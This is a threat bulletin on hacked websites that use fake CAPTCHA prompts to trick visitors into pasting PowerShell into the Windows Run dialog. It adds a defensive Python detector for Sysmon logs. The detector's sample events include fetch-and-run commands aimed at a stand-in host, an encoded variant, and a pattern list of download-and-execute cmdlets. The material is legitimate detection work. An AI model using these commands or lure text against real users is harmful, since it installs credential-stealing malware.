
Who: Threat actors are compromising widely used websites across various industries, embedding a fake CAPTCHA challenge to deliver malware.
What: Visitors to a compromised site are shown a fake CAPTCHA "verification" step, either embedded in the site itself or reached through a redirect to a second site, whose instructions have the user copy a command and paste it into the Windows Run dialog. Running that command executes PowerShell code that installs information-stealing malware. Affected sites include HEP2go (a physical therapy video site) and several auto dealership websites.
Impact: Users who follow the fake CAPTCHA's instructions risk having their systems compromised by malware that can steal sensitive information such as credentials and browser data. Arctic Wolf has implemented detections for this attack and urges users to remain cautious.
Recommendations:
Avoid websites with suspicious CAPTCHA challenges. A legitimate CAPTCHA is solved inside the browser and never requires running a command; if a CAPTCHA asks you to copy and paste a command into the Windows Run dialog (Win+R), treat the site as compromised and do not run the command.
Install Arctic Wolf Agent & Sysmon to detect post-compromise activity (visit link below for details).
Implement security awareness training to help users recognize and report suspicious activity.
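As an added example (not code from the bulletin or from Arctic Wolf), the Python script below shows the kind of check that Sysmon process-creation telemetry (Event ID 1) makes possible for this lure. A command pasted into the Run dialog is spawned by the desktop shell, so the check looks for powershell.exe or pwsh.exe with explorer.exe as its parent and a command line carrying indicators typical of this technique: a hidden window, an encoded command, a remote fetch combined with Invoke-Expression, a URL, or "I am not a robot" text appended so the Run box looks like a verification step. The indicator list, the two-indicator threshold, the example.invalid URL, the base64 filler and all sample events are assumptions constructed for this example; the bulletin itself only states that PowerShell code executes.

```python
"""Flag fake-CAPTCHA ("paste this into Win+R") PowerShell launches in Sysmon
Event ID 1 (process creation) records.

Added example for this bulletin, not Arctic Wolf's detection logic. All sample
events below are constructed; the indicator list is an assumption based on how
this lure typically works, not something the bulletin specifies.
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass

EVT_NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

# A command typed into the Run dialog is spawned by the desktop shell, so the
# parent process is explorer.exe. That parent/child pair is the pivot here.
RUN_DIALOG_PARENTS = {"explorer.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Assumed command-line indicators (ordered; hits are reported in this order).
SUSPICIOUS_PATTERNS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)),
    ("encoded_command", re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("remote_fetch", re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I)),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("url", re.compile(r"https?://", re.I)),
    # The lure often appends "I am not a robot"-style text so the Run box looks legitimate.
    ("captcha_lure_text", re.compile(r"(?:i am not a robot|verification|captcha)", re.I)),
]


@dataclass
class Finding:
    record_id: int
    image: str
    parent: str
    indicators: list


def parse_sysmon_event(xml_text):
    """Flatten one Sysmon event XML into a dict of EventID, RecordId and EventData fields."""
    root = ET.fromstring(xml_text)
    system = root.find(EVT_NS + "System")
    record = {
        "EventID": int(system.findtext(EVT_NS + "EventID")),
        "RecordId": int(system.findtext(EVT_NS + "EventRecordID")),
    }
    for data in root.find(EVT_NS + "EventData").findall(EVT_NS + "Data"):
        record[data.get("Name")] = data.text or ""
    return record


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def analyze_event(event):
    """Return the indicator names that fire for a Run-dialog PowerShell launch, else []."""
    if event.get("EventID") != 1:
        return []
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    if image not in POWERSHELL_IMAGES or parent not in RUN_DIALOG_PARENTS:
        return []
    cmd = event.get("CommandLine", "")
    return [name for name, pattern in SUSPICIOUS_PATTERNS if pattern.search(cmd)]


def detect(events, min_indicators=2):
    """Return a Finding for every event with at least min_indicators hits.
    Requiring two avoids flagging a user who simply opened PowerShell from Run."""
    findings = []
    for event in events:
        hits = analyze_event(event)
        if len(hits) >= min_indicators:
            findings.append(Finding(event["RecordId"], event["Image"], event["ParentImage"], hits))
    return findings


# Constructed Sysmon Event ID 1 record in the shape the event log exports (not real telemetry).
SAMPLE_XML = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>1</EventID><EventRecordID>101</EventRecordID></System>
  <EventData>
    <Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
    <Data Name="CommandLine">powershell.exe -w hidden -c "iex (irm http://example.invalid/verify)" # I am not a robot - reCAPTCHA Verification ID: 3812</Data>
    <Data Name="ParentImage">C:\Windows\explorer.exe</Data>
  </EventData>
</Event>"""

PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    parse_sysmon_event(SAMPLE_XML),
    # Benign: user opened PowerShell from the Run dialog with no arguments.
    {"EventID": 1, "RecordId": 102, "Image": PS_IMAGE, "CommandLine": "powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    # Benign: scheduled script with a hidden window, but the parent is not the shell.
    {"EventID": 1, "RecordId": 103, "Image": PS_IMAGE,
     "CommandLine": r"powershell.exe -NoProfile -w hidden -File C:\scripts\backup.ps1",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    # Malicious variant: encoded payload pasted into Run (base64 blob is constructed filler).
    {"EventID": 1, "RecordId": 104, "Image": PS_IMAGE,
     "CommandLine": "powershell -nop -w hidden -enc SQBFAFgAIAAoAEkAUgBNACAAaAB0AHQAcAA6AC8ALwBlAHgAYQBtAHAAbABlAC4AaQBuAHYAYQBsAGkAZAApAA==",
     "ParentImage": r"C:\Windows\explorer.exe"},
    # Unrelated process launched from the shell.
    {"EventID": 1, "RecordId": 105, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe", "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"record {f.record_id}: {f.image} <- {f.parent}: {', '.join(f.indicators)}")
```

Run as a script it reports records 101 and 104; in production the same logic would run against events pulled from the Microsoft-Windows-Sysmon/Operational log. The parent-process condition is what separates this lure from a scheduled script launched with the same hidden-window flag, as the third sample shows. Tune the patterns against your own baseline before alerting, since a word like "verification" on its own will appear in benign command lines.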
Read the full article HERE